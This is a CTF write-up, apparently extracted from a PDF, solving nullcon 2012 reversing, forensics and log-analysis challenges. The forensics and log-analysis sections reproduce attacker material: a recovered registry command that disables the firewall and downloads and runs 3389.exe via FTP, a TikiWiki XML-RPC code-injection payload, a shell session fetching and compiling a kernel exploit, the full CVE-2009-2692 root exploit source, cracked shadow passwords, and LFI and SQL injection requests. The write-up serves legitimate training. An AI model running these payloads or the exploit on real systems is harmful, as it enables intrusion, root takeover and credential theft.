# data = File.open("Stub.bin","rb"){ |fd| fd.read(fd.stat.size)}
pe = Metasm::LoadedPE.load(pe_in)
pe.cpu = Metasm::Ia32.new
pe.encode_file('Stub.exe','exe')
Tried debugging using OllyDBG. Code has anti-debugger checks because of which most paths did not
work. Tried changing entry points but none worked. Located call to MessageBox. Manually checked
where it gets called from. WinDBG analysis showed that the program has crashed while trying to
execute code @0xdeadbabe. Found code push 0xdeadbabe followed by retn which is an indirect
way of calling 0xdeadbabe.
0040106C 68 BEBAADDE PUSH DEADBABE
00401071 . C3 RETN
Changed the address to just before the MessageBox call code.
0040106C . 68 DA104000 PUSH stub3.004010DA
00401071 . C3 RETN ; RET used as a jump to 004010DA
Open the program using Ollydbg. Select and set the following as new origin:
00401000 $ 55 PUSH EBP
Run code
Flag: TheLastSamurai
Screenshot:
24. Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno
While conducting the raid on a suspect the police found the system containing no suspicious
information in the form of a code. While comparing various files they came up with a suspicious
sound file and feel that the code is hidden inside the same.
You are asked to find out that code if hidden in the file.
Evidence URL: http://www.nullcon.net/challenge/data/JS.rar
Tools used: audacity
Approach: Open with audacity and analyse.
25. At some offsets, we find that the channel data differ. Extract only the portions where there is hidden
audio in the right channel.
26. Playing it seems like some numbers in foreign language.
If we apply effect reverse, mute left channel and play, we can hear English numbers.
27. Flag: 12344346765
Forensics Level 2: Andar Ch0r
A company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the internal codes
secretly outside the organisation. The company sniffed the data being sent and reconstructed it to
find that a word document was being sent.
The company strongly suspects that there is some hidden passport code in the document.
You as a forensic investigator are provided with the copy of that file and are required to find out the
hidden code. The code has to be in whole number.
Evidence URL: http://www.nullcon.net/challenge/data/Passport_Number.doc
Doing strings on file shows that there are hidden worksheets. Renamed to Password.xls and file
opened properly in Excel.
Unhide hidden sheets. Nullcon2 sheet becomes visible.
28. Open VB editor, select Sheet3 (Nullcon3) and press F4 to view properties. Change property visibility
of Nullcon3 sheet from 2 – xlSheetVeryHidden to -1 xlSheetVisible
Here is your Passport number to the new level 6924289
Flag: 6924289
Forensics Level 3: Not Guilty!
An employee was suspected of using some malicious files. The employee asserts that he is not guilty
cause he never used any program except microsoft word and excel.
While conducting the analysis nothing was found in the registry suggesting that something did run
automatically. All locations that can run program automatically were examined and nothing
malicious was found.
You as an investigator are provided with a piece of hive to carve out if anything was deleted from
the hive and provide the exact "Value", "value type" and "data" deleted so that the employee gets
the justice.
Approach: Tried with Regripper, yaru. Worked with reglookup-recover
(http://projects.sentinelchicken.org/reglookup/)
$>reglookup-recover.exe software
OFFSET,REC_LENGTH,REC_TYPE,PATH,NAME,NK_MTIME,NK_NVAL,VK_TYPE,VK_VALUE,VK_DATA_LEN,
SK_OWNER,SK_GROUP,SK_SACL,SK_DACL,RAW_CELL
29. ERROR: Bad cell length encountered while parsing unallocated cells at offset 0x0
0A27908.
00B4EEA0,00000020,VALUE,,Shell,,,SZ,c:windowssystem32cmd.exe /c net1 stop
sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>>
cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp
-s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q,490,,,,,Text in Unallocated segment
hidden registry key
Flag: c:windowssystem32cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org>
cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get
3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del
cmd.txt /q
References: http://www.digitalforensicssolutions.com/papers/recovering-and-analyzing-deleted-
registry-hives.pdf
Forensics Level 4: Intriguing MBR
A suspected drive was found in bad shape. The data extraction was almost impossible and the final
copy obtained carried only few bytes. The bytes belonged to the initial sectors and wherever the
system could not read the space was filled with 0x00 so as to keep the offset of the data obtained
intact.
The initial sector displayed a messy MBR data.
As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drives
2) The start and end LBA for each partition
3) The Start and end of unpartitioned space between two clusters
The Drive showed to be a SATA drive with 512 bytes of LBA
Tools Used: mmls (Sleuthkit), vi
Approach:
Run mmls on image.
[nullc0n]$ mmls -t gpt ./image.dd
Invalid magic value (GPT Header: 5452000020494600)
30. Fix header magic value (EFI PART) and number of partitions using vi in binary mode (:%!xxd) and run
mmls again. (See references)
[nullc0n]$ mmls -t gpt ./image3.dd
Invalid sector address (gpt_load_table: Starting sector too large for image)
Download Sleuthkit and comment out section where mmls is throwing error and exiting. Compile
and run.
Patch
[nullc0n]$ diff -pu sleuthkit-3.2.3/tsk3/vs/gpt.c*
--- sleuthkit-3.2.3/tsk3/vs/gpt.c 2012-01-15 18:32:13.302732773 +0530
+++ sleuthkit-3.2.3/tsk3/vs/gpt.c.orig 2012-01-20 16:43:37.251203455 +0530
@@ -212,7 +212,7 @@ gpt_load_table(TSK_VS_INFO * vs)
}
// make sure the first couple are in the image bounds
- /*if ((i < 2)
+ if ((i < 2)
&& (tsk_getu64(vs->endian, ent->start_lba) > max_addr)) {
tsk_error_reset();
tsk_errno = TSK_ERR_VS_BLK_NUM;
@@ -221,7 +221,7 @@ gpt_load_table(TSK_VS_INFO * vs)
free(sect_buf);
free(ent_buf);
return 1;
- }*/
+ }
if ((name = tsk_malloc(256)) == NULL) {
[nullc0n]$ ./sleuthkit-3.2.3/tools/vstools/mmls -t gpt ./image3.dd
GUID Partition Table (EFI)
Offset Sector: 0
Units are in 512-byte sectors
Slot Start End Length Description
00: Meta 0000000000 0000000000 0000000001 Safety Table
01: ----- 0000000000 0000002047 0000002048 Unallocated
02: Meta 0000000001 0000000001 0000000001 GPT Header
03: Meta 0000000002 0000000004 0000000003 Partition Table
04: 00 0000002048 0098566144 0098564097
05: 08 0098566145 0098568191 0000002047
06: 01 0098568192 0182454271 0083886080
07: 02 0182454272 0203425791 0020971520
08: 03 0203425792 0253757439 0050331648
09: 04 0253757440 0310380543 0056623104
10: 05 0310380544 0352323583 0041943040
11: 06 0352323584 0406849535 0054525952 L
12: 07 0406849536 0488397134 0081547599
31. Refered Wiki for GUID Partitition table for UUID for file system types. Mapping done manually.
References:
http://en.wikipedia.org/wiki/Master_boot_record
http://en.wikipedia.org/wiki/GUID_Partition_Table
http://www.aqfire.com/boot/
http://www.digitalforensics.ch/nikkel09.pdf
Forensics Level 5: Universal Swindlers Bayonet
Anusandhaanic Daakus Ltd. Is a company whose strength lies in the researches it conducts. Very
often the employees leaving the organisation manage to carry the research data alongwith. This
time company decided to go for the investigation and called upon a forensic investigator. This
investigator captured the memory dump and shut the system down. On resuming the system he
finds that the drive has been encrypted and is left with only the memory dump.
You as an investigator are required to find out the following information from the dump
1) Serial No. of external drive
2) Date and time (IST) when the drive was first connected
3)Date and time (IST) when the drive was last connected
4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exe
Tools Used: string, grep volatility framework
Steps:
[flevel5]$ python ./volatility/trunk/vol.py hivelist -f ./null.img
Volatile Systems Volatility Framework 2.1_alpha
Virtual Physical Name
0x8067b184 0x0067b184 [no name]
0xe19fb380 0x0a1ec380 DeviceHarddiskVolume1Documents and SettingsuserLocal
SettingsApplication DataMicrosoftWindowsUsrClass.dat
0xe1a448d0 0x0a5038d0 DeviceHarddiskVolume1Documents and SettingsuserNTUSER.DAT
0xe17599f8 0x089629f8 DeviceHarddiskVolume1Documents and SettingsLocalServiceLocal
SettingsApplication DataMicrosoftWindowsUsrClass.dat
0xe1754008 0x0895b008 DeviceHarddiskVolume1Documents and
SettingsLocalServiceNTUSER.DAT
32. 0xe172b430 0x08508430 DeviceHarddiskVolume1Documents and
SettingsNetworkServiceLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat
0xe1726698 0x083fd698 DeviceHarddiskVolume1Documents and
SettingsNetworkServiceNTUSER.DAT
0xe1447008 0x06c9d008 DeviceHarddiskVolume1WINDOWSsystem32configsoftware
0xe1447b60 0x06c9db60 DeviceHarddiskVolume1WINDOWSsystem32configdefault
0xe14476b8 0x06c9d6b8 DeviceHarddiskVolume1WINDOWSsystem32configSAM
0xe1430330 0x06c90330 DeviceHarddiskVolume1WINDOWSsystem32configSECURITY
0xe1331b60 0x02c6eb60 [no name]
0xe101bad8 0x02994ad8 DeviceHarddiskVolume1WINDOWSsystem32configsystem
0xe1008b60 0x029cdb60 [no name]
We find that SYSTEM is located at offset 0xe101bad8. We use this to print specific registry keys.
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "CurrentControlSet" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: User Specified
Key name: CurrentControlSet (V)
Last updated: 2012-01-06 12:39:30
Subkeys:
Values:
REG_LINK SymbolicLinkValue : (V) RegistryMachineSystemControlSet001
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K
"ControlSet001ControlDeviceClasses" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: User Specified
Key name: DeviceClasses (S)
Last updated: 2012-01-05 13:24:36
Subkeys:
(S) {378de44c-56ef-11d1-bc8c-00a0c91405dd}
(S) {3abf6f2d-71c4-462a-8a92-1e6861e6af27}
(S) {a5dcbf10-6530-11d2-901f-00c04fb951ed}
(S) {f18a0e88-c30c-11d0-8815-00a0c906bed8}
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K
"ControlSet001ControlDeviceClasses{a5dcbf10-6530-11d2-901f-00c04fb951ed}" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: User Specified
33. Key name: {a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)
Last updated: 2012-01-05 13:24:36
Subkeys:
(S) ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed}
Values:
[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K
"ControlSet001ControlDeviceClasses{a5dcbf10-6530-11d2-901f-
00c04fb951ed}##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-
00c04fb951ed}" -f null.img
Volatile Systems Volatility Framework 2.1_alpha
Legend: (S) = Stable (V) = Volatile
----------------------------
Registry: User Specified
Key name: ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)
Last updated: 2012-01-06 12:22:13
Subkeys:
(S) #
Values:
REG_SZ DeviceInstance : (S) USBVid_0bc2&Pid_21012GEL32TN
From above, we find that the Serial number of the removable disk is 2GEL32TN
When It was first connected, the registry entry
SYSTEMControlSet001ControlDeviceClasses{a5dcbf10-6530-11d2-901f-00c04fb951ed} was
created. Therefore its last update time 2012-01-05 13:24:36 UTC is our flag2 after converting to IST.
Its subkey ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed} is
updated every-time the device is connected. Therefore its last update time is our flag 3
Used pslist in volatility to list processes
Offset(V) Name PID PPID Thds Hnds Time
---------- -------------------- ------ ------ ------ ------ -------------------
0x821c6a00 System 4 0 59 240 1970-01-01 00:00:00
0x81f5fb10 smss.exe 580 4 3 21 2012-01-06 12:39:37
0x81ff92a0 csrss.exe 644 580 11 349 2012-01-06 12:39:38
0x81ff8da0 winlogon.exe 668 580 20 503 2012-01-06 12:39:38
0x81fe35d0 services.exe 712 668 15 258 2012-01-06 12:39:38
0x81feebb8 lsass.exe 724 668 26 343 2012-01-06 12:39:38
0x81fa8ac0 svchost.exe 900 712 20 201 2012-01-06 12:39:38
0x82018438 svchost.exe 968 712 10 227 2012-01-06 12:39:39
0x81f84210 svchost.exe 1056 712 72 1193 2012-01-06 12:39:39
0x82002530 svchost.exe 1176 712 5 58 2012-01-06 12:39:39
0x81fe8620 svchost.exe 1212 712 14 204 2012-01-06 12:39:39
0x81f586f0 spoolsv.exe 1336 712 13 122 2012-01-06 12:39:39
0x81f7a428 explorer.exe 1584 1568 13 374 2012-01-06 12:39:40
0x81b73020 alg.exe 516 712 7 103 2012-01-06 12:39:49
0x81b941e0 nullcon.exe 484 1584 1 22 2012-01-06 12:40:07
34. 0x81b403a8 cmd.exe 1048 1584 1 31 2012-01-06 12:40:13
0x81ba3020 cmd.exe 320 484 1 28 2012-01-06 12:40:20
0x81b7b020 win32dd.exe 856 1048 1 21 2012-01-06 12:40:30
Initially thought Flag4 would be explorer.exe which Is the parent process of nulcon.exe. However, it
was not correct.
Using strings and grep to search for nullcon.exe
[flevel5]$ strings null.img |grep -i nullcon.exe
nullcon.exe
C:WINDOWSsystem32Nullcon.exe
C:WINDOWSsystem32Nullcon.exe
nullcon.exe
NULLCON.EXE
C:WINDOWSsystem32Nullcon.exe
C:WINDOWSsystem32Nullcon.exe
Nullcon.exe
C:WINDOWSsystem32Nullcon.exe
Nullcon.exe "C:WINDOWSsystem32mshearts.exe"
Nullcon.exe
This gives us Flag 4 as mshearts.exe
References:
1. https://blogs.sans.org/computer-
forensics/files/2009/08/usb_device_forensics_xp_guide.pdf
2. http://cse.spsu.edu/raustin2/coursefiles/forensics/How_to_use_Volatility_v2.pdf
Log Analysis Level 1: Basic
Log URL: http://www.nullcon.net/challenge/data/report
Found interesting line in log:
+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing is
enabled: /challenge/logically_insane/
Found askmelate.asp in /challenge/logically_insane
Clue: Ask the proper question to get the proper answer<!-- askmelater.asp?question=? -->
35. Question: How to find the flag?
http://www.nullcon.net/challenge/logically_insane/askmelater.asp?question=how%20to%20find%2
0the%20flag?
Flag: 6bb61e3b7bce0931da574d19d1d82c88
Log Analysis Level 2: Mystery Password
Find password for user suppadmin
Log URL: http://www.nullcon.net/challenge/data/log3.pcap
Tools Used: Wireshark
Steps: Open file in wireshark.
Flag: ..Supp@..adm1n # Flag includes the dots
Log Analysis Level 3: Clever Intruder
Log URL: http://www.nullcon.net/challenge/data/access.rar
Only 3 IPs were found in log. Started with 192.168.0.107
[nullc0n]$ cat access.log |grep 192.168.0.107
37. <extension>php</extension>
<request><![CDATA[POST /tikiwiki/scripts/server.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 192.168.221.154
User-Agent: Internet Explorer 6.0
Content-Length: 360
<?xml
version="1.0"?><methodCall><methodName>foo.bar</methodName><params><param><value><st
ring>1</string></value></param><param><value><string>1</string></value></param><param><val
ue><string>1</string></value></param><param><value><string>1</string></value></param><para
m><value><name>','')); system('id
'); die; /*</name></value></param></params></methodCall>]]></request>
<status>200</status>
<responselength>283</responselength>
<mimetype>text</mimetype>
<response><![CDATA[HTTP/1.1 200 OK
Date: Thu, 12 Jan 2012 07:24:16 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Connection: close
Content-Type: text/html
Content-Length: 54
uid=33(www-data) gid=33(www-data) groups=33(www-data)
]]></response>
<comment></comment>
</item>
From the above it looks like a code execution bug in XMLRPC used in tikiwiki. Google search yielded
CVE-2005-1921
Flag: CVE-2005-1921
Log Analysis Level 5: Waat Laga Server
Log URL: http://www.nullcon.net/challenge/data/dump.rar
Flag-I: Vulnerable Parameter in 1st Attack
Flag-II: Vulnerable Parameter in 2nd Attack
Flag-III: Names of the people who discovered the Local Privilege Escalation Exploit used
Flag-IV: root Password
Tools Used: Wireshark. john
Loaded file in Wireshark. Sorted the packets by packet size and used Follow TCP Stream to analyse
sessions starting with the largest ones. Found the following in one such TCP stream:
38. sh: no job control in this shell
sh-3.1$ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t
sh-3.1$ uname -a
Linux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386
GNU/Linux
sh-3.1$ cd /tmp/
sh-3.1$ ls -la
total 904
drwxrwxrwt 15 root root 4096 Jan 11 10:07 .
drwxr-xr-x 23 root root 4096 Jan 11 09:38 ..
drwxrwxrwt 2 root root 4096 Jan 11 07:15 .ICE-unix
-r--r--r-- 1 root root 11 Jan 11 07:07 .X0-lock
drwxrwxrwt 2 root root 4096 Jan 11 07:07 .X11-unix
drwxrwxrwt 2 root root 4096 Jan 11 07:06 .font-unix
srw-rw-rw- 1 root root 0 Jan 11 07:07 .gdm_socket
drwx------ 2 root root 4096 Mar 6 2009 .mozilla
-rw-rw-rw- 1 mysql mysql 13 Jan 11 09:57 1.txt
-rw-rw-rw- 1 mysql mysql 36 Jan 11 09:58 2.txt
drwx------ 2 achen achen 4096 Mar 10 2009 gconfd-achen
drwx------ 2 dstevens dstevens 4096 Mar 11 2009 gconfd-dstevens
drwx------ 2 ghighland ghighland 4096 Mar 10 2009 gconfd-ghighland
drwx------ 2 root root 4096 Mar 18 2009 gconfd-root
drwx------ 3 sorzek sorzek 4096 Jan 11 07:15 gconfd-sorzek
drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 keyring-FiP3XI
srwxrwxr-x 1 achen achen 0 Mar 10 2009 mapping-achen
srwxrwxr-x 1 dstevens dstevens 0 Mar 11 2009 mapping-dstevens
srwxrwxr-x 1 ghighland ghighland 0 Mar 10 2009 mapping-ghighland
srwxr-xr-x 1 root root 0 Mar 18 2009 mapping-root
srwxrwxr-x 1 sorzek sorzek 0 Jan 11 07:15 mapping-sorzek
drwx------ 2 sorzek sorzek 4096 Jan 11 07:16 orbit-sorzek
-rwsr-xr-x 1 root root 720888 Jan 11 10:09 sh
drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 ssh-yXwuKb2964
-rw-rw-rw- 1 mysql mysql 13 Jan 11 10:07 test1.txt
-rw-rw-rw- 1 mysql mysql 36 Jan 11 10:07 test2.txt
drwx------ 2 sorzek sorzek 4096 Jan 11 07:15 virtual-sorzek.7IeXOH
-rw------- 1 sorzek sorzek 1062 Jan 11 08:15 xses-sorzek.HeSMY4
sh-3.1$ wget http://192.168.221.130/exploit/9479.c
--10:09:30-- http://192.168.221.130/exploit/9479.c
=> `9479.c'
Connecting to 192.168.221.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,379 (3.3K) [text/x-csrc]
0K ... 100% 61.97 MB/s
10:09:30 (61.97 MB/s) - `9479.c' saved [3379/3379]
sh-3.1$ gcc 9479.c -o root
sh-3.1$ ./root
sh: no job control in this shell
41. ossecm:!!:14312:0:99999:7:::
ossecr:!!:14312:0:99999:7:::
sh-3.1# exit
exit
sh-3.1$ exit
exit
Copied /etc/shadow to pass.txt and used john(http://www.openwall.com/john/) with wordlist
(http://download.openwall.net/pub/wordlists/all.gz) to crack password file using a downloaded
password file.
[nullc0n]$ john -show pass.txt
root:zuzana:15350:0:99999:7:::
sorzek:pacman:14312:0:99999:7:::
2 password hashes cracked, 5 left
This gives us Flag IV: zuzana
In another TCP session we got:
HTTP/1.1 200 OK
Date: Thu, 12 Jan 2012 06:18:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 11 Jan 2012 12:36:23 GMT
ETag: "41d4c-d33-4b63fe12b3b1c"
Accept-Ranges: bytes
Content-Length: 3379
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-csrc
/*
**
** 0x82-CVE-2009-2692
** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)
** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** spender and venglin's code is very excellent.
** Thankful to them.
**
** Greets: Brad Spengler <spender(at)grsecurity(dot)net>,
** Przemyslaw Frasunek <venglin(at)czuby(dot)pl>.
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
42. **
** "Slow and dirty exploit for this one"
**
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>
unsigned int uid, gid;
void kernel_code()
{
.unsigned long where=0;
.unsigned long *pcb_task_struct;
.where=(unsigned long )&where;
.where&=~8191;
.pcb_task_struct=(unsigned long *)where;
.while(pcb_task_struct){
..if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&
...pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&
...pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&
...pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){
...pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;
...pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;
...break;
..}
..pcb_task_struct++;
.}
.return;
./*
.** By calling iret after pushing a register into kernel stack,
.** We don't have to go back to ring3(user mode) privilege level. dont worry. :-}
.**
.** kernel_code() function will return to its previous status which means before sendfile() system
call,
.** after operating upon a ring0(kernel mode) privilege level.
.** This will enhance the viablity of the attack code even though each kernel can have different CS
and DS address.
.*/
}
void *kernel=kernel_code;
int main(int argc,char *argv[])
{
.int fd_in=0,fd_out=0,offset=1;
43. .void *zero_page;
.uid=getuid();
.gid=getgid();
.if(uid==0){
..fprintf(stderr,"[-] check ur uidn");
..return -1;
.}
./*
.** There are some cases that we need mprotect due to the dependency matter with SVR4.
(however, I did not confirm it yet)
.*/
.if(personality(0xffffffff)==PER_SVR4){
..if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
...perror("[-] mprotect()");
...return -1;
..}
.}
.else
if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP
_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
...perror("[-] mmap()");
...return -1;
.}
.*(char *)0x00000000=0xff;
.*(char *)0x00000001=0x25;
.*(unsigned long *)0x00000002=(unsigned long)&kernel;
.*(char *)0x00000006=0xc3;
.if((fd_in=open(argv[0],O_RDONLY))==-1){
..perror("[-] open()");
..return -1;
.}
.if((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){
..if((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){
...perror("[-] socket()");
...return -1;
..}
.}
gogossing:
./*
.** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,
.** an attacker can make all the processes runing under current user uid 0.
.*/
.if(sendfile(fd_out,fd_in,&offset,2)==-1){
..if(offset==0){
...perror("[-] sendfile()");
...return -1;
..}
..close(fd_out);
44. ..fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);
.}
.if(getuid()==uid){
..if(offset){
...offset=0;
..}
..goto gogossing; /* all process */
.}
.close(fd_in);
.close(fd_out);
.execl("/bin/sh","sh","-i",NULL);
.return 0;
}
/* eoc */
// milw0rm.com [2009-08-24]
This gives us Flag III as Tavis Ormandy and Julien Tinnes
Another TCP session gave the following:
GET /index.html?page=../../../../../../../../../tmp/test2.txt%00&c=ls HTTP/1.1
Host: 192.168.221.143
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 11 Jan 2012 15:08:00 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.2
Content-Length: 1373
46. </table>
<h1 class="title">Professor Ehks Center for Data Studies</h1>
<div id="main">
1.<br />
<b>Notice</b>: Use of undefined constant c - assumed 'c' in <b>/tmp/test2.txt</b> on line
<b>1</b><br />
admin
calendar
conf
images
inc
index.html
index.html.bak
mail
pages
restricted
robots.txt
sql
.3.4.5
</div>
<div id="center" style="text-align:center;width:100%"><a
href="mailto:webmaster@localhost">webmaster</a></div>
</body>
</html>
The above shows that there is a flaw in parameter page.
Another attack targeted parameter id as shown below:
GET
/index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,%27test%27,3,4,5+INTO+
OUTFILE+%27/tmp/test1.txt%27--+- HTTP/1.1
Host: 192.168.221.143
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
47. HTTP/1.1 200 OK
Date: Wed, 11 Jan 2012 15:07:02 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.1.2
Content-Length: 1336
Connection: close
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title> Prof. Ehks
Blog</title>
<style type="text/css">
BODY {
.font-family: helvetica, arial;
.padding: 0px;
.margin: 0px;
}
TABLE.nav {
.background-color: #336699;
}
TABLE.nav a {
.color: white;
.text-decoration: none;
}
H1.title {
.width: 100%;
.background-color: #6699cc;
.padding: 5px;
.margin: 0px;
.border-bottom: 3px solid #113366;
}
DIV#main {
.margin: 5px;
}
</style>
</head>
Similarly there were other attacks as shown below
48. From the above we can infer that the attacks on parameter id was done before the attack on
parameter page. Attacker first exploited SQL injection flaw
Therefore the flags are:
Flag I id
Flag II page
Flag III Tavis Ormandy and Julien Tinnes
Flag IV zuzana